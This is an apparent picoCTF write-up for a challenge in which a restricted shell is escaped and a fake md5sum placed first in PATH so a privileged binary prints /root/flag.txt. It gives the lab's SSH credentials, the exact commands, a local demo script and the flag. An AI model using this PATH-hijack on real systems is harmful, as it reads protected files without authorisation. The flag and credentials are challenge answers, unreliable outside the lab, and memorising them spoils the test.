Description
The second flaghasher binary lives in /usr/local/bin and still shells out to md5sum. Escape the restricted shell, drop a fake md5sum earlier in PATH, and cat the flag.
Setup
SSH to rescued-float.picoctf.net -p 49568 (password f3b61b38).
Locate /usr/local/bin/flaghasher and spawn an unrestricted shell (`bash`).
ssh -p 49568 ctf-player@rescued-float.picoctf.net
find / -type f -iname flaghasher 2>/dev/null
bash
cd /usr/local/bin && echo "/bin/cat /root/flag.txt" > md5sum && chmod +x md5sum
export PATH=.:$PATH && ./flaghasher
Solution
- Step 1: Escape rbash restrictions. The login shell is restricted (rbash), which refuses `cd` and any change to PATH, so run `bash` to get an unrestricted shell first. Then `cd /usr/local/bin`.
- Step 2: Hijack md5sum again. Write a md5sum wrapper that cats /root/flag.txt, make it executable, prepend `.` to PATH, and run flaghasher. This works because flaghasher invokes md5sum by bare name rather than by absolute path, so the shell's PATH search finds the wrapper in the current directory before the real /usr/bin/md5sum. A shebang is optional: when execve fails with ENOEXEC, sh falls back to interpreting the file as a script.
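The following script is an added example, not part of the original writeup, that reproduces the PATH-hijack mechanism locally so it can be studied without the picoCTF box. It stages a fake md5sum in a temporary directory, prepends that directory to PATH, and then runs `md5sum` through `/bin/sh -c` the way a program calling system("md5sum ...") would. The flag file, the hijack directory and the function names (`hijack_md5sum`, `run_victim`) are all constructed for the demo; the fake md5sum is written without a shebang on purpose, mirroring the writeup, to show that sh still runs it as a script.

```shell
#!/bin/sh
# Added example (not the writeup's own commands): PATH hijacking of md5sum,
# reproduced in a throwaway directory instead of /usr/local/bin.

# Stage a fake md5sum in $1 that prints the file named by $2 (standing in for
# /root/flag.txt). Prints the path "md5sum" now resolves to, to confirm the
# fake is found before the real one.
hijack_md5sum() {
    dir="$1"
    target="$2"
    mkdir -p "$dir"
    # No shebang, exactly like `echo "/bin/cat /root/flag.txt" > md5sum`:
    # execve() fails with ENOEXEC and sh falls back to running it as a script.
    printf '/bin/cat %s\n' "$target" > "$dir/md5sum"
    chmod +x "$dir/md5sum"
    # Subshell so the modified PATH does not leak out of the function.
    ( PATH="$dir:$PATH"; command -v md5sum )
}

# Simulate the victim binary: run "md5sum <file>" via sh -c, as system(3) does,
# with the hijack directory first in PATH. Whatever the lookup finds is executed.
run_victim() {
    dir="$1"
    PATH="$dir:$PATH" /bin/sh -c 'md5sum /dev/null'
}

# Stand-alone demo with a constructed flag file.
demo_dir=$(mktemp -d)
printf 'picoCTF{constructed_demo_flag}\n' > "$demo_dir/flag.txt"
echo "md5sum now resolves to: $(hijack_md5sum "$demo_dir/bin" "$demo_dir/flag.txt")"
echo "victim output:          $(run_victim "$demo_dir/bin")"
rm -rf "$demo_dir"
```

The same lookup order is what the writeup exploits: with `.` at the front of PATH and the cwd set to the directory holding the wrapper, any process that execs `md5sum` by name, regardless of what privileges it runs with, ends up running the wrapper. The check `command -v md5sum` is a quick way to confirm the hijack is in place before triggering the target.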
Flag
picoCTF{Co-@utH0r_Of_Sy5tem_b!n@riEs_fc06...}
Same technique as hash-only-1; only the binary's path and the restricted login shell differ.